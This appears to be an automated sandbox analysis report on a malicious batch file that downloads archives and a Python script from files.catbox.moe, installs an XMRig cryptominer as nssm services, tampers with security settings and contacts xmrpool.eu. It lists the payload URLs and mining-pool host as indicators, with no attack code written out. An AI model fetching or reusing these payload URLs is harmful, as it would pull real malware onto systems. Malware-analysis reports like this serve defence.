                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
                    Source: svchost.exe, 00000008.00000002.3756610551.000001E918D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000008.00000002.3756610551.000001E918D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts2
                    Windows Management Instrumentation
                    1
                    Scripting
                    1
                    Exploitation for Privilege Escalation
                    1
                    Disable or Modify Tools
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    3
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Obfuscated Files or Information
                    LSASS Memory1
                    System Service Discovery
                    Remote Desktop ProtocolData from Removable Media11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Command and Scripting Interpreter
                    43
                    Windows Service
                    43
                    Windows Service
                    1
                    Timestomp
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts12
                    Service Execution
                    Login Hook11
                    Process Injection
                    1
                    DLL Side-Loading
                    NTDS43
                    System Information Discovery
                    Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts2
                    PowerShell
                    Network Logon ScriptNetwork Logon Script1
                    Masquerading
                    LSA Secrets271
                    Security Software Discovery
                    SSHKeylogging14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials161
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Process Injection
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569814 Sample: 2zirzlMVqX.bat Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 78 xmrpool.eu 2->78 80 time.windows.com 2->80 82 files.catbox.moe 2->82 86 Malicious sample detected (through community Yara rule) 2->86 88 Antivirus detection for dropped file 2->88 90 Multi AV Scanner detection for dropped file 2->90 92 4 other signatures 2->92 10 cmd.exe 1 2->10         started        13 nssm.exe 2->13         started        15 svchost.exe 2->15         started        17 5 other processes 2->17 signatures3 process4 signatures5 104 Suspicious powershell command line found 10->104 19 powershell.exe 12 10->19         started        22 powershell.exe 12 10->22         started        24 conhost.exe 10->24         started        26 xmrig.exe 13->26         started        29 conhost.exe 13->29         started        106 Changes security center settings (notifications, updates, antivirus, firewall) 15->106 31 MpCmdRun.exe 15->31         started        process6 dnsIp7 94 Suspicious powershell command line found 19->94 96 Powershell drops PE file 19->96 33 powershell.exe 14 1006 19->33         started        37 powershell.exe 21 22->37         started        84 xmrpool.eu 51.89.217.80 OVHFR France 26->84 98 Query firmware table information (likely to detect VMs) 26->98 100 Found strings related to Crypto-Mining 26->100 40 conhost.exe 31->40         started        signatures8 process9 dnsIp10 76 files.catbox.moe 108.181.20.35, 443, 49699, 49701 ASN852CA Canada 33->76 58 C:\Users\user\AppData\Local\...\winsound.pyd, PE32+ 33->58 dropped 60 C:\Users\user\AppData\...\vcruntime140_1.dll, PE32+ 33->60 dropped 62 C:\Users\user\AppData\...\vcruntime140.dll, PE32+ 33->62 dropped 66 568 other files (313 malicious) 33->66 dropped 42 conhost.exe 33->42         started        64 C:\Users\user\AppData\Local\Temp\funny.tmp, ASCII 37->64 dropped 102 Found strings related to Crypto-Mining 37->102 44 powershell.exe 37->44         started        48 conhost.exe 37->48         started        file11 signatures12 process13 file14 68 C:\Users\user\AppData\Local\Temp\xmrig.exe, PE32+ 44->68 dropped 70 C:\Users\user\AppData\...\xmrig-cuda.dll, PE32+ 44->70 dropped 72 C:\Users\user\AppData\...\nvrtc64_120_0.dll, PE32+ 44->72 dropped 74 9 other files (7 malicious) 44->74 dropped 108 Sample is not signed and drops a device driver 44->108 50 nssm.exe 44->50         started        52 nssm.exe 44->52         started        54 nssm.exe 44->54         started        56 4 other processes 44->56 signatures15 process16

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    2zirzlMVqX.bat12%ReversingLabsScript-BAT.Downloader.Heuristic
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\xmrig.exe100%AviraHEUR/AGEN.1311290
                    C:\Users\user\AppData\Local\Temp\xmrig.exe100%Joe Sandbox ML
                    C:\ProgramData\.logstxt\nssm.exe (copy)8%ReversingLabs
                    C:\ProgramData\.logstxt\nvrtc-builtins64_124.dll (copy)0%ReversingLabs
                    C:\ProgramData\.logstxt\nvrtc64_120_0.dll (copy)0%ReversingLabs
                    C:\ProgramData\.logstxt\xmrig-cuda.dll (copy)42%ReversingLabsWin64.Trojan.Miner
                    C:\ProgramData\.logstxt\xmrig.exe (copy)83%ReversingLabsWin64.Trojan.Miner
                    C:\Users\user\AppData\Local\Temp\WinRing0x64.sys5%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\nssm.exe8%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\nvrtc-builtins64_124.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\nvrtc64_120_0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\BLAKE2b.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\BLAKE2b.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\BLAKE2s.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\BLAKE2s.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\CMAC.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\CMAC.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\HMAC.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\HMAC.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\KMAC128.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\KMAC128.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\KMAC256.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\KMAC256.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\KangarooTwelve.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\KangarooTwelve.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\MD2.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\MD2.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\MD4.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\MD4.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\MD5.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\MD5.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\Poly1305.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\Poly1305.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\RIPEMD.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\RIPEMD160.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\RIPEMD160.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA1.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA1.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA224.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA224.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA256.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA256.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA384.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA384.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA3_224.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA3_224.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA3_256.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA3_256.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA3_384.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA3_384.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA3_512.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA3_512.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA512.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHA512.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHAKE128.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHAKE128.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHAKE256.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\SHAKE256.pyi0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\TupleHash128.py0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\TupleHash128.pyi0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://tidelift.com/subscription/pkg/pypi-urllib3?utm_source=pypi-urllib3&utm_medium=referral&utm_c0%Avira URL Cloudsafe
                    http://httpbin.org/robots.txt0%Avira URL Cloudsafe
                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxies0%Avira URL Cloudsafe
                    https://httpbin.org/0%Avira URL Cloudsafe
                    https://peps.python.org/pep-0632/)0%Avira URL Cloudsafe
                    https://files.catb0%Avira URL Cloudsafe
                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)0%Avira URL Cloudsafe
                    https://urllib3.readthedocs.io/en/latest/sponsors.html).0%Avira URL Cloudsafe
                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%Avira URL Cloudsafe
                    https://static.docs.arm.com/ihi0044/g/aaelf32.pdf0%Avira URL Cloudsafe
                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html0%Avira URL Cloudsafe
                    https://setuptools.pypa.io/en/stable/history.html0%Avira URL Cloudsafe
                    https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/0%Avira URL Cloudsafe
                    https://urllib3.readthedocs.io0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    files.catbox.moe
                    108.181.20.35
                    truefalse
                      high
                      xmrpool.eu
                      51.89.217.80
                      truefalse
                        unknown
                        time.windows.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://files.catbox.moe/1qm51s.zipfalse
                            high
                            https://files.catbox.moe/gw2gji.pyfalse
                              high
                              https://files.catbox.moe/d6pvcr.zipfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://httpbin.org/robots.txtpowershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://github.com/urllib3/urllib3/blob/main/CHANGES.rstpowershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://pypi.org/project/urllib3powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/astral-sh/ruffpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.microsoftpowershell.exe, 0000000C.00000002.1358799349.0000026332785000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/urllib3/urllib3/issues/2168z(Andreypowershell.exe, 00000009.00000002.1946719482.000002368144D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681458000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://img.shields.io/pypi/pyversions/setuptools.svgpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://img.shields.io/pypi/v/setuptools.svgpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://tidelift.com/subscription/pkg/pypi-urllib3?utm_source=pypi-urllib3&utm_medium=referral&utm_cpowershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://github.com/urllib3/urllib3/issues/2168powershell.exe, 00000009.00000002.1946719482.000002368142D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681437000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)powershell.exe, 00000009.00000002.1946719482.0000023681513000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wheel.readthedocs.io/en/stable/news.htmlpowershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://img.shields.io/codecov/c/github/pypa/setuptools/master.svg?logo=codecov&logoColor=whitepowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/urllib3/urllib3/pull/2624powershell.exe, 00000009.00000002.1946719482.00000236819C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://files.catbox.moe/gw2gji.pyDefaYTpowershell.exe, 00000004.00000002.1299331743.000001DCD1B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://refspecs.linuxfoundation.org/elf/gabi4powershell.exe, 00000009.00000002.1946719482.0000023682184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368218D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://files.catbpowershell.exe, 00000009.00000002.2045048921.00000236FD9E8000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://pypi.org/project/setuptoolspowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1327060198.000001DCE3BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1301594968.000001DCD53CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1327060198.000001DCE3A7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2030791717.00000236901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2030791717.0000023690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1423292874.00000263443E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.0000026335B06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1423292874.00000263442AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E819FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2592051177.0000025E90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2592051177.0000025E901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2351984899.000001B647AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2351984899.000001B647C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://tools.ietf.org/html/rfc7230#section-3.2.4powershell.exe, 00000009.00000002.1946719482.0000023681C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963powershell.exe, 00000009.00000002.1946719482.0000023681ACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://blog.jaraco.com/skeletonpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://github.com/urllib3/urllib3/issues/3020powershell.exe, 00000009.00000002.1946719482.000002368142D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681437000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://peps.python.org/pep-0632/)egg_info.cpython-312.pyc.9.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1301594968.000001DCD3A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.0000026334231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B637A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369651169.000002728C25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371933085.000002728C22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.mdpowershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/python/mypy/issues/731powershell.exe, 00000009.00000002.1946719482.000002368237A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxiespowershell.exe, 00000009.00000002.1946719482.00000236818E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://github.com/pyca/pyopenssl/pull/933powershell.exe, 00000009.00000002.1946719482.0000023681688000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.2170524020.000001B637D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.2170524020.000001B637D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/pypa/wheelpowershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.python.org/dev/peps/pep-0427/powershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://contoso.com/Iconpowershell.exe, 0000000F.00000002.2351984899.000001B647C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://httpbin.org/powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.apache.org/licenses/powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/urllib3/urllib3/issues/3267.powershell.exe, 00000009.00000002.1946719482.0000023681688000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://xmrig.com/wizardxmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                high
                                                                                                http://tools.ietf.org/html/rfc3986#section-5.2.4powershell.exe, 00000009.00000002.1946719482.0000023681CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.python.org/psf/)powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.2170524020.000001B637D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://img.shields.io/badge/skeleton-2024-informationalpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535powershell.exe, 00000009.00000002.1946719482.0000023681CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681CC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.pythonlabs.com/logos.htmlpowershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/python-hyper/rfc3986powershell.exe, 00000009.00000002.1946719482.0000023681CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
